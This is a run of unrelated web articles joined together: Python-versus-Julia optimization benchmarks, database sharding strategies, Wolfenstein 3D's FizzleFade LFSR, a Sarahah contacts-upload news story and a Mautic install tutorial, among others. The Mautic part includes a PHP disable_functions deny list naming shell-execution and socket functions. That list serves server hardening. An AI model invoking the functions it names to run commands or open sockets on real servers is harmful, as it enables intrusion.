When using Cython, we need to import Numpy in the cell to which Cython is applied. Numpy arrays are declared with a special syntax indicating the type of the elements and the number of dimensions of the array (1D, 2D, etc.).  The decorators tell Cython to remove bounds checking.

%%cython
import numpy as np
import cython

@cython.boundscheck(False)
@cython.wraparound(False)
cdef double[:] \
qsort_kernel_cython_numpy_type(double[:] a, \
                               long lo, \
                               long hi):
    cdef:
        long i, j
        double pivot
    i = lo
    j = hi
    while i < hi:
        pivot = a[(lo+hi) // 2]
        while i <= j:
            while a[i] < pivot:
                i += 1
            while a[j] > pivot:
                j -= 1
            if i <= j:
                a[i], a[j] = a[j], a[i]
                i += 1
                j -= 1
        if lo < j:
            qsort_kernel_cython_numpy_type(a, lo, j)
        lo = i
        j = hi
    return a

def benchmark_qsort_numpy_cython():
    lst = np.random.rand(5000)
    qsort_kernel_cython_numpy_type(lst, 0, len(lst)-1)

Timing the benchmark_qsort_numpy_cython() function yields

1000 loops, best of 3: 772 µs per loop

We are about 23 times faster than the original benchmark, but this is still not the best way to use Python.  The best way is to use the Numpy built-in sort() function.  Its default behavior is to use the quick sort algorithm.  Timing this code

defbenchmark_sort_numpy():
lst=np.random.rand(5000)
np.sort(lst)

yields

1000 loops, best of 3: 306 µs per loop

We are now 58 times faster than the original benchmark!  Julia takes 419 micro seconds on that benchmark, hence compiled Python is 40% faster.

I know, some readers will say that I am not comparing apple to apple.  I disagree.  Remember, the task at hand is to sort an input array using the host language in the best possible way.  In this case, the best possible way is to use a built-in function. 

Profiling Code

Let us now look at a third example: computing the Mandelbrot set.  The Julia team used this Python code:

def mandel(z):
    maxiter = 80
    c = z
    for n in range(maxiter):
        if abs(z) > 2:
            return n
        z = z*z + c
    return maxiter

def mandelperf():
    r1 = np.linspace(-2.0, 0.5, 26)
    r2 = np.linspace(-1.0, 1.0, 21)
    return [mandel(complex(r, i)) for r in r1 for i in r2]

assert sum(mandelperf()) == 14791

The last line is a sanity check.  Timing the mandelperf() function yields:

100 loops, best of 3: 6.57 ms per loop

Using Cython yields:

100 loops, best of 3: 3.6 ms per loop

Not bad, but we can do better using Numba.  Unfortunately, Numba does not compile list comprehensions yet.  Therefore we cannot apply it to the second function, but we can apply it to the first one.  Our code looks like this.

@jit
def mandel_numba(z):
    maxiter = 80
    c = z
    for n in range(maxiter):
        if abs(z) > 2:
            return n
        z = z*z + c
    return maxiter

def mandelperf_numba():
    r1 = np.linspace(-2.0, 0.5, 26)
    r2 = np.linspace(-1.0, 1.0, 21)
    return [mandel_numba(complex(r, i)) for r in r1 for i in r2]

Timing it yields

1000 loops, best of 3: 481 µs per loop

Not bad: about seven times faster than Cython, and more than 13 times faster than the original Python code!

Can we do more?  One way to know is to profile the code.  The built-in %prun profiler is not precise enough here, and we must use a better profiler known as line_profiler.  It can be installed via pip:

pip install line_profiler

Once installed, we load it:

%load_ext line_profiler

We can then profile the function using a magic:

%lprun -s -f mandelperf_numba mandelperf_numba()

It outputs the following in a pop up window.

Timer unit: 1e-06 s

Total time: 0.003666 s
File: <ipython-input-102-e6043a6167d6>
Function: mandelperf_numba at line 11

Line #      Hits         Time  Per Hit   % Time  Line Contents
==============================================================
    11                                           def mandelperf_numba():
    12         1         1994   1994.0     54.4      r1 = np.linspace(-2.0, 0.5, 26)
    13         1          267    267.0      7.3      r2 = np.linspace(-1.0, 1.0, 21)
    14         1         1405   1405.0     38.3      return [mandel_numba(complex(r, i)) for r in r1 for i in r2]

We see that the bulk of the time is spent in the first and last lines of our mandelperf_numba() function.  The last line is a bit complex, let us break it into two pieces, and profile again:

def mandelperf_numba():
    r1 = np.linspace(-2.0, 0.5, 26)
    r2 = np.linspace(-1.0, 1.0, 21)
    c3 = [complex(r, i) for r in r1 for i in r2]
    return [mandel_numba(c) for c in c3]

Profiler output becomes

Timer unit: 1e-06 s

Total time: 0.002002 s
File: <ipython-input-113-ba7b044b2c6c>
Function: mandelperf_numba at line 11

Line #      Hits         Time  Per Hit   % Time  Line Contents
==============================================================
    11                                           def mandelperf_numba():
    12         1          678    678.0     33.9      r1 = np.linspace(-2.0, 0.5, 26)
    13         1          235    235.0     11.7      r2 = np.linspace(-1.0, 1.0, 21)
    14         1          617    617.0     30.8      c3 = [complex(r, i) for r in r1 for i in r2]
    15         1          472    472.0     23.6      return [mandel_numba(c) for c in c3]

We see that the calls to the function mandel_numba() takes only one fourth of the total time.  The rest of the time is spent in the mandelperf_numba() function.  Optimizing it is worthwhile.

Using Numpy Again

Using Cython isn't helping much here, and Numba does not apply.  One way out of this dilemma is to use Numpy again.  We will replace the following by Numpy code that produces an equivalent result.

    return [mandel_numba(complex(r, i)) for r in r1 for i in r2]

This code is building what is known as a 2D mesh.  It computes the complex number representation of points whose coordinates are given by r1 and r2.  Point Pij has coordinates r1[i] and r2[j], and is represented by the complex number r1[i] + 1j*r2[j], where the special constant 1j represents the unit imaginary number i.

We can code this computation directly:

@jit
def mandelperf_numba_mesh():
    width = 26
    height = 21
    r1 = np.linspace(-2.0, 0.5, width)
    r2 = np.linspace(-1.0, 1.0, height)
    mandel_set = np.empty((width, height), dtype=int)
    for i in range(width):
        for j in range(height):
            mandel_set[i, j] = mandel_numba(r1[i] + 1j*r2[j])
    return mandel_set

Note that I changed the return value to be a 2D array of integers.  That's closer to what we need if we were to display the result.

Timing it yields

10000 loops, best of 3: 126 µs per loop

We are about 50 times faster than the original Python code!  Julia takes 196 micro seconds on that benchmark, hence compiled Python is 60% faster.

[Edited on February 2, 2016].  We can do even better in Python, see How To Quickly Compute Mandelbrot Set In Python.

Vectorizing

Let us look at another example.  I am not sure what is being measured, to be honest, but here is the code the Julia team used.

def parse_int():
    for i in range(1, 1000):
        n = random.randint(0, 2**32-1)
        s = hex(n)
        m = int(s, 16)
        assert m == n

Actually, the Julia team's code has an extra instruction that strips the trailing 'L' in case it is present.  That line is required for my Anaconda install, but it is not required for my Python 3 install, therefore I removed it.  The original code is:

def parse_int():
    for i in range(1, 1000):
        n = random.randint(0, 2**32-1)
        s = hex(n)
        if s[-1] == 'L':
            s = s[0:-1]
        m = int(s, 16)
        assert m == n

Timing the modified code yields:

100 loops, best of 3: 3.29 ms per loop

Neither Numba nor Cython seem to help.

As I was puzzled by this benchmark, I profiled the original code.  Here is the result:

Timer unit: 1e-06 s

Total time: 0.013807 s
File: <ipython-input-3-1d995505b176>
Function: parse_int at line 1

Line #      Hits         Time  Per Hit   % Time  Line Contents
==============================================================
     1                                           def parse_int():
     2      1000          699      0.7      5.1      for i in range(1,1000):
     3       999         9149      9.2     66.3          n = random.randint(0,2**32-1)
     4       999         1024      1.0      7.4          s = hex(n)
     5       999          863      0.9      6.3          if s[-1]=='L':
     6                                                       s = s[0:-1]
     7       999         1334      1.3      9.7          m = int(s,16)
     8       999          738      0.7      5.3          assert m == n

 

We see that most of the time is in generating the random numbers.  I am not sure this was the intent of the benchmark...

One way to speed this up is to use the Numpy random generator.  Given that Numpy uses C ints, we must limit the largest value to 2**31 - 1.  The code becomes:

def parse_int1_numpy():
    for i in range(1, 1000):
        n = np.random.randint(0, 2**31-1)
        s = hex(n)
        m = int(s, 16)
        assert m == n

Timing it yields

1000 loops, best of 3: 1.05 ms per loop

Not bad, more than 3 times faster!  Applying Numba does not help, but Cython provides some further improvement:

%%cython
import numpy as np
import cython

@cython.boundscheck(False)
@cython.wraparound(False)
cpdef parse_int_cython_numpy():
    cdef:
        int i, n, m
    for i in range(1, 1000):
        n = np.random.randint(0, 2**31-1)
        m = int(hex(n), 16)
        assert m == n

Timing it yields:

1000 loops, best of 3: 817 µs per loop

One way to further speed this up is to move the generation of random numbers out of the loop using Numpy.  We create an array of random numbers in one step. 

def parse_int_vec():
    n = np.random.randint(2**31-1, size=1000)
    for i in range(1, 1000):
        ni = n[i]
        s = hex(ni)
        m = int(s, 16)
        assert m == ni

Timing it yields:

1000 loops, best of 3: 848 µs per loop

Not bad, 4 times faster than the original code, and close to the Cython code speed.

Once we have an array, it seems silly to loop over it to apply the hex() and int() functions one element at a time.  The good news is that Numpy provides a way to apply a function to an array rather than in a loop, namely the numpy.vectorize() function.  This function takes as input a function that operates on one object at a time.  It returns a new function that operates on an array.

vhex = np.vectorize(hex)
vint = np.vectorize(int)

def parse_int_numpy():
    n = np.random.randint(0, 2**31-1, 1000)
    s = vhex(n)
    m = vint(s, 16)
    np.all(m == n)
    return s

This code runs a bit faster, and nearly as fast as the Cython code:

1000 loops, best of 3: 733 µs per loop

Cython can be used to speed this up.

%%cython
import numpy as np
import cython

@cython.boundscheck(False)
@cython.wraparound(False)
cpdef parse_int_vec_cython():
    cdef:
        int i, m
        int[:] n
    n = np.random.randint(0, 2**31-1, 1000)
    for i in range(1, 1000):
        m = int(hex(n[i]), 16)
        assert m == n[i]

Timing it yields.

1000 loops, best of 3: 472 µs per loop

Summary

We have described above how to speed up 4 of the examples used by the Julia team.  There are 3 more:

  • pisum can run 29 times faster with Numba (a sketch follows after this list). 
  • randmatstat can be made 2 times faster by better use of Numpy. 
  • randmatmul is so simple that no tool can be applied to it. 
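For pisum, here is a hedged sketch of what the Numba version might look like, assuming the standard micro-benchmark definition (repeatedly recomputing the partial sum of 1/k^2); the only change from plain Python is the @jit decorator:

from numba import jit

@jit
def pisum_numba():
    s = 0.0
    for j in range(500):
        s = 0.0                    # the benchmark deliberately redoes the work
        for k in range(1, 10001):
            s += 1.0 / (k * k)
    return s

print(pisum_numba())               # ~1.6449, i.e. close to pi**2/6

Timing it with %timeit, as before, shows where the claimed speedup comes from.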

The notebook containing complete code for all 7 examples is available on github and on nbviewer.

Let's summarize in a table where we are.  We display the speedup we get between the original Python code and the optimized one.  We also display the tools we used for each of the benchmark examples used by the Julia team.

 

Time in microseconds    Julia     Python      Python      Julia /            Numpy   Numba   Cython
                                  Optimized   Original    Python Optimized
Fibonacci 64 bits           80         24          NA         3.8                             X
Fibonacci BigInt        12,717      1,470       3,770         8.7
quicksort                  419        306      17,700         1.4              X              X
Mandelbrot                 196        126       6,570         1.6              X       X
pisum                   34,783     20,400     926,000         1.7                      X
randmatmul              95,975     83,700      83,700         1.1              X
parse int                  244        472       3,290         0.5              X              X
randmatstat             14,544     83,200     160,000         0.2              X

 

This table shows that optimized Python code is faster than Julia for the first 6 examples, and slower for the last 2.  Note that for Fibonacci I used the recursive code to be fair.  

I do not think that these micro benchmarks provide a definite answer about which language is fastest.  For instance, the randmatstat example deals with 5x5 matrices.  Using Numpy arrays for that is overkill.  One should benchmark with much larger matrices.

I believe that one should benchmark languages on more complex code.  A good example is given in Python vs Julia - an example from machine learning.  In that article, Julia seems to outperform Cython.  If I have time I'll give it a try with Numba.

Anyway, it is fair to say that on the micro benchmark, Python performance matches Julia performance when the right tools are used.  Conversely, we can also say that Julia's performance matches that of compiled Python.  This in itself is interesting given Julia does it without any need to annotate or modify the code.

Takeaway

Let's pause for a moment.  We have seen a number of tools that should be used when Python code performance is critical:

  • Profiling with line_profiler.
  • Writing better Python code to avoid unnecessary computation.
  • Using vectorized operations and broadcasting with Numpy.
  • Compiling with Cython or Numba.

Use these tools to get a feel for where they are useful.  At the same time, use them wisely.  Profile your code so that you can focus on where optimization is worth it.  Indeed, rewriting code to make it faster can sometimes obfuscate it or make it less versatile.  Therefore, only do this when the resulting speedup is worth it.  Donald Knuth captured this advice nicely:

“We should forget about small efficiencies, say about 97% of the time: premature optimization is the root of all evil.”

Note however that Knuth's quote does not mean optimization isn't worth it; see for instance Stop Misquoting Donald Knuth! and The 'premature optimization is evil' myth.

Python code can, and should be, optimized when and where it makes sense.

Let me conclude with a list of interesting articles discussing the tools I used and more:

Update on August 2, 2016.  A reader, Ismael V.C. pointed me to the memoize function of Julia, and I updated the post accordingly.

Update on December 16, 2015. Python 3.4 has a built-in cache that can greatly speed up the Fibonacci() function.  I updated the post to show its use.

Update on December 17, 2015.  Added running times for Julia 0.4.2 on the same machine where Python was run. 

Update on Feb 2, 2016.  Added the code on github and on nbviewer, and updated timings with Python 3.5.1.

Update on March 6, 2016.  Improved parse int code using Numpy.

 

Tags: numpy, python, numba, julia, cython

Sharding data models


When it comes to scaling your database, there are challenges but the good news is that you have options. The easiest option of course is to scale up your hardware. And when you hit the ceiling on scaling up, you have a few more choices: sharding, deleting swaths of data that you think you might not need in the future, or trying to shrink the problem with microservices.

Deleting portions of your data is simple, if you can afford to do it. Regarding sharding, there are a number of approaches, and which one is right depends on a number of factors. Here we’ll survey five sharding approaches and dig into what factors guide you to each one.

Sharding by customer or tenant

SaaS applications often serve many customers (called ‘tenants’), which is why we often refer to these apps as “multi-tenant applications.” If you’re a SaaS business, it’s often true that data from one customer doesn’t interact with data from any of your other customers. This is quite different from a social network which has a lot of interdependencies between the data generated by different users.

With a SaaS application that is multi-tenant, the data is usually transactional. It turns out paying customers don’t like it too much if you lose some of their data along the way. Due to the nature of many of these transactional, multi-tenant SaaS applications (think: CRM software, marketing operations, web analytics), you need strong guarantees that when data is saved to the database, the data is going to stay there. And your customers expect you to enforce referential integrity.

Another interesting thing about multi-tenant applications is that their data model evolves over time to provide more and more functionality. Unlike consumer apps which benefit from network effects to grow, a B2B application grows by adding new (ideally sticky) features for customers. And more often than not, new features mean new data models. The end result is 10s to 100s of tables, at times with complex joins. If this sounds like you, sharding by tenant is a safe (and recommended) approach.

Sharding by geography

Another class of applications that has come to the forefront in recent years are location-based apps that key off geography: thanks iPhone. Whether it’s Lyft, Instacart, or Postmates, these apps have an important tie to location. You’re not going to live in Alabama and order grocery delivery from California. And if you were to order a Lyft pick-up from California to Alabama you’ll be waiting a good little while for your pickup.

But just because you have an app with a geographic slant to it doesn’t mean geography is the right shard key. The key to sharding by region is that your data within a specific geography doesn’t interact with data in another geography. Not all apps with geographical data are a fit for a geography-based sharding approach. Apps whose data interacts heavily across geographical boundaries (such as Foursquare) are less of a fit for sharding by geography.

Similar to the multi-tenant app above, data models for apps that depend on geographic location tend to be a bit more evolved. What I mean is, with apps that depend on location, you have a number of tables that have foreign key dependencies between each other and often join between each other on their queries. If you’re able to constrain your queries to a single geography and the data seldom crosses geographical boundaries, then sharding by geography can be a good approach for you.

Sharding by entity id (to randomly distribute data)

Our next data model can lend itself to a number of different database systems because it doesn’t have strong interdependence between your data models (read: no joins). With no need for joins, and often no need for transactions in the relational sense, there is a swath of databases that may or may not be able to help. The problem you’re solving for is that you have too much data for a single node (or core) to be able to process quickly.

When sharding by entity id, we want to distribute data as evenly as possible, to maximize the parallelism within our system. For a perfectly uniform distribution, you would shard by a random id, essentially round-robin’ing the data. Real life is a bit messier. While you may not have 50 tables with tight coupling between them, it’s very common to have 2-3 tables that you do want to join on. The most common place where we see the entity id model make sense is a web analytics use case.

If your queries have no joins at all, then using a uuid to shard your data by can make a lot of sense. If you have a few basic joins that relate to perhaps a session, then sharding the related tables by that same shard key can be ideal. Sharing a shard key across tables allows you to co-locate data for more complicated reporting, while still providing a fairly even distribution for parallelism.
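As a toy illustration (not Citus-specific, and the table and key names are made up), sharding by entity id usually comes down to hashing the shard key so that related rows land on the same shard:

import hashlib

NUM_SHARDS = 32

def shard_for(key):
    """Map a shard key to a shard number via a stable hash."""
    digest = hashlib.md5(str(key).encode('utf-8')).hexdigest()
    return int(digest, 16) % NUM_SHARDS

# Co-location: rows from different tables that share the same shard key hash
# to the same shard, so a join on session_id never has to cross shards.
event   = {'session_id': 'a1b2c3', 'url': '/pricing'}
session = {'session_id': 'a1b2c3', 'referrer': 'news.ycombinator.com'}
assert shard_for(event['session_id']) == shard_for(session['session_id'])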

Sharding a graph

Now we come to perhaps the most unique approach. When looking at a graph data model you see different approaches to scaling and different opinions on how easy sharding can be. The graph model is most common in popular B2C apps like Facebook and Instagram, apps that leverage the social graph. Here the relationship between the edges between the data can be just as key in querying as the data itself. In this category graph databases start to stand on their own as a valid solution for social graphs and apps with very high connections between the data. If you want to dig in further, the Facebook paper on their internal datastore TAO is a good read.

With a graph database there are two key items, objects which are typed nodes and associations which designate the connection to them. For the object, an example might be that Craig checked in at Citus; and the association would be with Daniel, who subscribed to Craig’s updates. Objects are generally things that can recur, and associations capture things such as the who (who subscribed to updates, who liked, etc.)
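
A toy sketch of that shape (made-up ids and names, not Facebook's actual TAO API) might look like this:

# Toy object/association store: typed objects keyed by id, plus typed,
# directed associations between ids (the "edges" of the social graph).
objects = {
    1: {"type": "user",    "name": "Craig"},
    2: {"type": "user",    "name": "Daniel"},
    3: {"type": "checkin", "who": "Craig", "place": "Citus"},
}

associations = {
    (2, "subscribed_to"): [1],   # Daniel subscribed to Craig's updates
    (1, "checked_in"):    [3],   # Craig checked in at Citus
}

def assoc_get(source_id, assoc_type):
    """Follow an association and return the target object ids."""
    return associations.get((source_id, assoc_type), [])

# Whose updates does Daniel (id 2) subscribe to?
for target_id in assoc_get(2, "subscribed_to"):
    print(objects[target_id]["name"])   # -> Craig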

With this model, data is often replicated in a few different forms, and it is the responsibility of the application to map to whichever form is most useful for a given query. The result is that you have multiple copies of your data sharded in different ways, typically with eventual consistency, and some application logic that has to map to your sharding strategy. For apps like Facebook and Reddit there is little choice but to take this approach, but it does come at some price.

Time partitioning

The final approach to sharding is one that certain apps naturally gravitate to. If you’re working on data where time is the primary axis, then partitioning by hour, day, week, or month is a natural fit. Time partitioning is incredibly common when looking at some form of event data. Event data may include clicks/impressions of ads, network event data, or data from a systems monitoring perspective. It turns out that most data has some type of time narrative to it, but does that make partitioning by time the right choice?

You will want to use a time-based approach to partitioning when:

  1. You generate your reporting/alerts by doing analysis on the data with time as one axis.
  2. You’re regularly rolling off data so that you have a limited retention of it.

An example where time partitioning does make sense is when you’re an ad network that only reports 30 days of data. Another example: you’re monitoring network logs and only looking at the last 7 days. The difficulty comes in when you have a mix of recent data (last 7 days) and historical data, say from a year ago.
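
A minimal sketch of that pattern (hypothetical event shape), where whole partitions are rolled off rather than individual rows deleted:

# A minimal sketch of time partitioning with a 7-day retention window:
# events are bucketed by day, and whole buckets older than the window are
# dropped instead of deleting individual rows.
from collections import defaultdict
from datetime import date, datetime, timedelta

RETENTION_DAYS = 7
partitions = defaultdict(list)          # day -> list of events

def ingest(event):
    partitions[event["ts"].date()].append(event)

def roll_off(today):
    cutoff = today - timedelta(days=RETENTION_DAYS)
    for day in [d for d in partitions if d < cutoff]:
        del partitions[day]             # cheap: the whole partition goes at once

ingest({"ts": datetime(2017, 8, 1, 12, 5),  "type": "click"})
ingest({"ts": datetime(2017, 8, 28, 9, 30), "type": "impression"})
roll_off(date(2017, 8, 28))
print(sorted(partitions))               # only days inside the retention window remain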

The right approach to sharding depends on your application

As with many decisions about architecture and infrastructure, tradeoffs have to be made, and it’s best to match the approach to the needs of your application (and the needs of your customers!). In the case of sharding, matching the type of sharding to the needs of your application is key to being able to scale effectively. When you match your data model and use case to the right type of sharding, many of the hard issues, like heavy investment in application re-writes, ensuring data consistency, and revisiting the problem when it’s gotten worse 6 months later, can fade away.

Are you trying to figure out how to scale your database—and which type of sharding is right for you? We’re happy to help: drop us a note and let’s see if Citus is a good fit for you.

Hevea project: H-principle, visualization and applications

Hevea Project

Convex integration is a mathematical theory developed by Mikhaïl Gromov in order to solve partial differential equations. This theory shows that a certain principle, called the homotopy principle or h-principle, is satisfied by many equations.

The Hévéa Project aims at showing that convex integration provides an effective tool to build explicit solutions of fundamental geometric equations. Based on this effective tool, in 2012 the Hévéa team achieved the first visualization of an isometric embedding of a flat torus.


FizzleFade


August 28th, 2017

I enjoy reading a lot of source code, and after 15 years in the field I feel like I have seen my fair share. Even with a full-time job, I still try to spare evenings here and there to read. I don't see myself ever stopping. It is always an opportunity to learn new things and to follow somebody's mind process.

Every once in a while I come across a solution to a problem that is so elegant and so creative that there is no other word but "beautiful" to describe it. Q_rsqrt, better known as the "Inverse Square Root" and popularized by Quake 3, definitely belongs to this family of breathtaking code. While I was working on the Game Engine Black Book: Wolfenstein 3D I came across another one: Fizzlefade.

Fizzlefade is the name of the function in charge of fading from one scene to another in Wolfenstein 3D. What it does is turn the pixels of the screen to a solid color, only one at a time, seemingly at random.

// What The Fizzle ?!

In Wolfenstein 3D, most screen transitions are done with a fade to black (by shifting the palette), but there are two instances when the screen transitions via fizzling:

  • When dying
  • When killing a boss

Below are a series of screenshots to illustrate fizzling. During the transition, each pixel on the screen is turned to red (when dying) or blue (when dispatching a boss). Each pixel is written only once and seemingly at random.

To implement this effect, a naive approach would have been to use the pseudo random generator US_RndT and keep track of which pixels had been fizzled. However, this would make the fade non-deterministic with regard to duration and would also waste CPU cycles since the same pixel coordinates (X,Y) could come up several times. There is a much faster and more elegant way to implement a pseudo-random value generator. The code responsible for this effect can be found in id_vh.cpp, function FizzleFade. At first, it is not obvious how it works.


  boolean FizzleFade
  {
      long rndval = 1;
      int x, y;

      do {
          // seperate random value into x/y pair
          asm mov ax, [WORDPTR rndval]
          asm mov dx, [WORDPTR rndval+2]
          asm mov bx, ax
          asm dec bl
          asm mov [BYTEPTR y], bl      // low 8 bits - 1 = y
          asm mov bx, ax
          asm mov cx, dx
          asm mov [BYTEPTR x], ah      // next 9 bits = x
          asm mov [BYTEPTR x+1], dl

          // advance to next random element
          asm shr dx, 1
          asm rcr ax, 1
          asm jnc noxor
          asm xor dx, 0x0001
          asm xor ax, 0x2000
  noxor:
          asm mov [WORDPTR rndval], ax
          asm mov [WORDPTR rndval+2], dx

          if (x > width || y > height)
              continue;
          fizzle_pixel(x, y);
          if (rndval == 1)
              return false;            // end sequence
      } while (1)
  }


If you can't read 16-bit TASM (I won't blame you), this is the C equivalent:

boolean fizzlefade(void)
{
    uint32_t rndval = 1;
    uint16_t x, y;

    do {
        y = rndval & 0x000FF;            /* Y = low 8 bits */
        x = (rndval & 0x1FF00) >> 8;     /* X = high 9 bits */
        unsigned lsb = rndval & 1;       /* Get the output bit. */
        rndval >>= 1;                    /* Shift register */
        if (lsb) {                       /* If the output is 0, the xor can be skipped. */
            rndval ^= 0x00012000;
        }
        if (x < 320 && y < 200)
            fizzle_pixel(x, y);
    } while (rndval != 1);

    return 0;
}

Which can be read as:

  • Initialize rndval to 1.
  • Break it down into 9 + 8 bits: use 8 bits to generate a Y coordinate and 9 bits for an X coordinate. Turn this pixel to red.
  • Subject rndval to a soup of XORing.
  • When rndval is somehow back to 1: stop, the screen is solid red.

This feels like dark magic. How is rndval supposed to return to the value 1? This technique is called a Linear Feedback Shift Register. The idea is to use one register to store a state, generate the next state, and also generate a value. To get the next value, you do a right shift. Since the rightmost bit disappears, a new one is needed on the left. To generate this new bit, the register uses "taps", which are bit offsets whose values are XORed together to produce the new bit. A Fibonacci representation shows a simple LFSR with two taps.

This register (with taps on bits 0 and 2) is able to generate 6 values before it cycles back to its original state. The following listing shows all of them (the stars indicate the tap locations).


   * * | value
  ======================
  0001 | 1
  1000 | 8
  0100 | 4
  1010 | A
  0101 | 5
  0010 | 2
  0001 | 1 -> CYCLE

  Sequence of 6 numbers before cycling .


Various arrangements of taps will produce different series. In the case of this four-bit register, the maximum number of values in a series is 16-1 = 15 (zero cannot be reached). This can be achieved with taps on bits 0 and 1. This is called a "Maximum-Length" LFSR.


    ** | value
  ======================
  0001 | 1
  1000 | 8
  0100 | 4
  0010 | 2
  1001 | 9
  1100 | C
  0110 | 6
  1011 | B
  0101 | 5
  1010 | A
  1101 | D
  1110 | E
  1111 | F
  0111 | 7
  0011 | 3
  0001 | 1 -> CYCLE

  Sequence of 15 numbers before cycling .

Wolf uses a 17-bit Maximum-Length LFSR with two taps to generate a series of pseudo-random values. Of these 17 bits, on each iteration, 8 are used to generate a Y coordinate and 9 an X coordinate. The corresponding pixel on screen is turned red/blue.

The Fibonacci representation helps to understand the general idea. But it is not how an LFSR is usually implemented in software. The reason is that the number of XOR operations scales linearly with the number of taps. With four taps, you need three sequential XOR operations:

There is an alternative way to represent an LFSR, called "Galois", which requires only one XOR regardless of the number of taps. It is the way Wolfenstein 3D writes 320x200=64000 pixels exactly once with a deterministic duration.
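
To see that in action, here is a small Python re-implementation of the same 17-bit Galois register (same 0x00012000 feedback mask as the C listing above; the function name is mine). It walks the register from its seed until it returns to 1 and confirms that no visible pixel coordinate is ever produced twice:

def fizzle_coordinates():
    rndval = 1
    while True:
        y = rndval & 0x000FF            # low 8 bits  -> Y
        x = (rndval & 0x1FF00) >> 8     # next 9 bits -> X
        lsb = rndval & 1
        rndval >>= 1
        if lsb:
            rndval ^= 0x00012000        # Galois feedback: a single XOR
        if x < 320 and y < 200:
            yield (x, y)
        if rndval == 1:                 # back to the seed: the sequence is over
            return

pixels = list(fizzle_coordinates())
print(len(pixels), len(set(pixels)))    # equal counts: no pixel is ever drawn twice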

Note : Because the effect works by plotting pixels individually, it was hard to replicate when developers tried to port the game to hardware-accelerated GPUs. None of the ports managed to replicate the fizzlefade except Wolf4SDL, which found an LFSR tap configuration to reach resolutions higher than 320x200.

Note : The tap configuration on 17 bits generates 131,071 values before cycling. Since 320x200=64000, it could have been implemented with a 16-bit maximum-length register with taps on 16, 15, 13 and 4 (in "Galois" notation). My assumption is that LFSR literature was hard to come across in 1991/1992 and finding the correct taps for a 16-bit maximum-length register was not worth the effort.


Recommended reading

Game Engine Black Book: Wolfenstein 3D


Fabien Sanglard @2017

The Sarahah App Has Been Secretly Saving All the Data in Your Address Book


Sarahah, the popular anonymous messaging app, built as a platform for honest feedback, has reportedly also been saving all the contacts in your phone.

It turns out, when you initially download and install the application, it saves and uploads your phone contacts and email addresses to the company’s servers, seemingly for no good reason. The behavior was first reported by The Intercept.

Sarahah’s founder, Zain Al-Abidin Tawfiq, tweeted in response to The Intercept’s article, saying that the contacts were being uploaded for a planned “find your friends” feature. The feature was then delayed due to “technical issues” and was accidentally not removed from the current version of the app. He added that “the data request will be removed on next update.”

The app doesn’t entirely hide that it’s interested in your contacts. On both iOS and Android, Sarahah asks for permission to access each user’s phone contacts – and even if you say no, you can still continue to use the app.

Zachary Julian, a senior security analyst at Bishop Fox, was the first to report the behavior to The Intercept. When he downloaded Sarahah to his Android phone, monitoring software installed on the device alerted him to the fact that the app was uploading his private data. Julian reportedly found that the same occurs on iPhone, and that the app will also re-download all of your contacts if you haven’t accessed it on your phone in some time.

As one of the most downloaded apps, Sarahah may have already harvested hundreds of millions of phone numbers and email addresses, Julian estimates. Rest assured though (hopefully) – the app’s privacy policy notes that it “will never sell the data you provide to any third party” without users’ prior and written consent, unless it is part of bulk data used only for research that does not identify the user.

Earlier this year, users of the service Unroll.me grew upset when it was reported that the company sold their data to Uber. While this kind of activity is often covered in an app’s terms of service, that certainly doesn’t mean most users are going to be aware of it.

Sarahah’s founder makes it sound like the company isn’t doing anything with the data it collects. But either way, that information seems to be needlessly getting sent to a company’s server when it doesn’t really need to be.

What are your thoughts? Share them down below in the comments.

Help radiologists detect lung cancer earlier


We’re calling on a global community of data scientists, engineers, designers, and researchers to build an open source software application that brings advances from machine learning into the clinic. We’re not just optimizing an algorithm for a single metric—we’re collaborating to build tools which put AI in the hands of clinicians.

In addition to pushing forward the cutting-edge of open clinical software, top contributors will be eligible for a share of $100,000 in monetary prizes generously provided by the Bonnie J. Addario Lung Cancer Foundation.

Contribute now by grabbing an issue from the project's GitHub repository and submitting a PR!

Mining Bitcoin with pencil and paper: 0.67 hashes per day



How to Install Mautic Marketing Automation Inside RunCloud Server


Mautic is a free and open source marketing automation software. It can monitor websites, create landing pages, and send emails to help you grow your business.

This is the first time I heard about Mautic, since our customers tried to follow the tutorials from LinuxBabe but were unable to do it correctly. So I guess we will try to do another tutorial, but with RunCloud. This tutorial also follows the LinuxBabe tutorial since I’ve never done this before.

As usual, create your web application inside RunCloud Panel and give it a name like the picture below.

Name: mautic-test (you can use any name that you want)
User: runcloud
PHPVersion: php 7.0

We are using PHP 7.0 since Mautic didn’t support PHP 7.1 yet when this post was published. Please use your selected user in every step below.

Now SSH inside your server with the selected username, download the latest Mautic and extract it to the root web app folder.

# SSH into your server using the selected web app user
ssh runcloud@<ip address>

# Change the working directory to your web app root path
cd webapps/mautic-test

# Download the Mautic script. The download might be a bit slow. Just wait for it to finish
wget https://www.mautic.org/download/latest -O mautic.zip

# Unzip it
unzip mautic.zip

This is what I got when I tried to open it from my browser.

It will give you a recommendation to enable php_posix.

The php_posix function is disabled by default inside RunCloud for security reasons. For Mautic, it is just a recommendation, not a requirement. But if you really want to enable it, go to your web app settings and replace all the disable_functions with the text below.

getmyuid,passthru,leak,listen,diskfreespace,tmpfile,link,ignore_user_abord,shell_exec,dl,set_time_limit,exec,system,highlight_file,source,show_source,fpassthru,virtual,proc_open,proc_close,proc_nice,proc_terminate,escapeshellcmd,ini_alter,popen,pcntl_exec,socket_accept,socket_bind,socket_clear_error,socket_close,socket_connect,curl_multi_exec,symlink,ini_alter,socket_listen,socket_create_listen,socket_read,socket_create_pair,stream_socket_server

Save the web application and refresh your browser. You will see the recommendation section disappear.

Go to the RunCloud Panel and create a new database and user. I will use mautic for both the database name and username. Don’t forget to attach the user to the database.

After you have done that, fill in the database settings inside the Mautic installer as follows. Use 127.0.0.1 for the database host, because inside RunCloud we are using TCP instead of a UNIX socket for the database.

After you have added the database, you will be greeted with the Mautic installation wizard. This should be easy because it is simply about how you want Mautic to behave.

After you have set up everything inside the installer, log in to the Dashboard and you will be greeted with a beautiful dashboard like the picture below.

When Mautic asks you which service you want to use to send email, don’t use PHP mail. I’ve talked about this before in the email blog post.

Please Spend Time with Competitor Analysis


Do like every great coach does, and get to know the tactics of the other team before getting into the match. Adjust tactics and figure out playing field positioning. Also, learn from others’ mistakes. For this reason, competitor analysis represents one of the most easily accessible methods to get a product on the right track.

Competitor analysis

And I can already hear why not to do this.

  • I don’t want to stalk others.
  • We should just focus on our own product and idea instead.
  • We are unique and have great ideas, so we don’t need anything else.
  • Everyone knows our competitors; there is no need to research common knowledge.
  • There is no time for that!

